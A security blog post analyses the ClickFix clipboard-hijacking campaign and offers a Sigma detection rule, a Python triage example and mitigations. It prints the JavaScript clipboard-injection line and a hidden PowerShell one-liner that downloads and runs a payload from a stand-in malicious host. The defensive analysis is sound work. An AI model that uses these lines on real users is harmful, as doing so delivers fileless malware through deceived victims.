
Dissecting the ClickFix Campaign: Clipboard Injection and Fileless PowerShell Exploits Explained

  • Writer: Akshay Jain
  • Jul 15
  • 3 min read

In an age where antivirus products and endpoint detection platforms have evolved to flag obvious malicious files, attackers are shifting their game to stay stealthy. Enter ClickFix, a sophisticated clipboard injection campaign that doesn’t rely on traditional executables or droppers.

Instead, it weaponizes PowerShell, lives in memory, abuses user trust, and leverages clipboard manipulation to deploy malware, often with zero files written to disk.


In this blog, we walk through the ClickFix campaign, breaking down:

  • The technical workflow of the attack

  • How clipboard injection works

  • The PowerShell command chain used for fileless execution

  • Real-world indicators of compromise

  • Sample detection rules and blue team workflows


What is the ClickFix Campaign?

First observed in early 2024, ClickFix refers to a cluster of clipboard hijacking attacks distributed via malicious websites posing as:

  • Software cracks

  • "Fix" tools for system errors

  • Pirated downloads

When the user lands on a compromised or malicious website, JavaScript is executed to copy malicious PowerShell commands directly into the clipboard.

Clickfix Campaign

The trap?

The site instructs the user to "Run the copied command in PowerShell to fix your issue."

Once executed, the command downloads and runs the payload in-memory, making detection much harder for legacy antivirus tools.


Technical Breakdown: Clipboard Injection and Fileless Execution


Step 1: Clipboard Injection via JavaScript

When a user visits a malicious ClickFix page, this code runs:

navigator.clipboard.writeText("powershell -w hidden -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://malicious-site.com/payload.ps1')\"");

This single line silently overwrites the user's clipboard content with a one-line PowerShell downloader. Modern browsers only allow navigator.clipboard.writeText() after a user gesture, which is why these pages wrap the call in a click handler on a fake "Fix" button rather than firing it on page load.


Step 2: User-Triggered Execution

The user is tricked into:

  • Opening PowerShell as Administrator

  • Pressing Ctrl + V

  • Hitting Enter

Boom! The payload is fetched and executed filelessly, entirely in memory.


Step 3: Payload Behavior

The downloaded payload.ps1 typically:

  • Establishes persistence via WMI or registry

  • Downloads additional modules (Info-stealers, RATs)

  • Uses Living Off the Land Binaries (LOLBins) for lateral movement


Why Are Fileless Attacks Like This Hard to Detect?

Traditional AV relies on:

  • File signatures

  • Heuristics on file behavior

  • Executable scanning


ClickFix bypasses all of them by:

  • Not writing anything to disk

  • Running completely in memory

  • Using trusted Windows components (like PowerShell and WebClient)

  • Leveraging user action for execution


Detection Use Cases for Blue Teams

Sample Sigma Rule (PowerShell Clipboard Hijack)

title: Suspicious PowerShell Command Execution
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX'
      - '-nop'
      - '-w hidden'
  condition: selection
level: high

Two tuning notes: Image is logged as a full path, so it is matched with endswith rather than an exact 'powershell.exe'; and a list under contains is OR-ed, so a lone '-nop' from an admin script will fire this rule too. In production, pair the selection with a second one (or use contains|all) so that several of these flags must co-occur, as they do in the clipboard one-liner above.

Sysmon Rule for Clipboard Changes (Indirect)

While clipboard events aren’t directly logged in Sysmon, analysts can monitor:

  • Execution of clip.exe

  • Process tree from browsers > clipboard interaction > PowerShell
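
To show how the rule's indicators behave on real-looking telemetry, here is an added Python example (not code from the original post) that applies the same case-insensitive contains matching to constructed Sysmon-style process-creation events and, going beyond the Sigma rule, counts how many indicators co-occur so that a lone -nop is not scored like the full clipboard one-liner. The event fields, sample paths and the benign command lines are assumptions constructed for the example.

```python
from dataclasses import dataclass

# Indicators copied from the Sigma rule above; Sigma string matching is case-insensitive.
COMMANDLINE_INDICATORS = ("DownloadString", "IEX", "-nop", "-w hidden")

@dataclass
class ProcessEvent:
    image: str          # Sysmon EID 1 "Image" (Security 4688 "NewProcessName"): a full path
    command_line: str   # Sysmon "CommandLine"

def match_indicators(event: ProcessEvent) -> list:
    """Return the rule's indicators found in a powershell.exe command line, in rule order."""
    if not event.image.lower().endswith("\\powershell.exe"):  # Image is a path: endswith, not equals
        return []
    cmd = event.command_line.lower()
    return [ind for ind in COMMANDLINE_INDICATORS if ind.lower() in cmd]

def classify(event: ProcessEvent, min_hits: int = 2) -> str:
    """'high' when at least min_hits indicators co-occur (the clipboard one-liner carries all four),
    'low' for a single hit such as a lone -nop in an admin script, 'none' otherwise."""
    hits = match_indicators(event)
    if len(hits) >= min_hits:
        return "high"
    return "low" if hits else "none"

# Constructed sample events, not real telemetry. The first carries the command the page shows being
# written to the clipboard; the second is a benign scheduled script; the third is not PowerShell at all.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(PS_PATH,
                 "powershell -w hidden -nop -c \"IEX(New-Object Net.WebClient)"
                 ".DownloadString('http://malicious-site.com/payload.ps1')\""),
    ProcessEvent(PS_PATH, r"powershell.exe -nop -File C:\Scripts\inventory.ps1"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd /c echo DownloadString"),
]

def triage(events=SAMPLE_EVENTS) -> dict:
    """Bucket command lines by severity so an analyst sees the high-confidence hits first."""
    buckets = {"high": [], "low": [], "none": []}
    for ev in events:
        buckets[classify(ev)].append(ev.command_line)
    return buckets

if __name__ == "__main__":
    for level, cmds in triage().items():
        for cmd in cmds:
            print(f"[{level}] {cmd}")
```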


Mitigation Recommendations

  • Block known bad domains via DNS filtering

  • Monitor outbound connections from PowerShell

  • Use security plugins that warn about clipboard modification

  • Avoid downloading "fix" tools from unknown sources

  • Never paste unverified PowerShell code


The Threat Is Real and It’s Already in Your Clipboard.

The ClickFix campaign is a prime example of how attackers exploit human behavior, system trust, and native OS tools to bypass traditional defenses.

SOC analysts must now monitor not just malware but malicious behaviors, especially fileless execution chains initiated by users themselves.

If your detection strategy doesn’t account for in-memory attacks and clipboard hijacks, you may already be exposed.


Happy cyber-exploration! 🚀🔒


Note: Feel free to drop your thoughts in the comments below - whether it's feedback, a topic you'd love to see covered, or just to say hi! Don’t forget to join the forum for more engaging discussions and stay updated with the latest blog posts. Let’s keep the conversation going and make cybersecurity a community effort!


-AJ



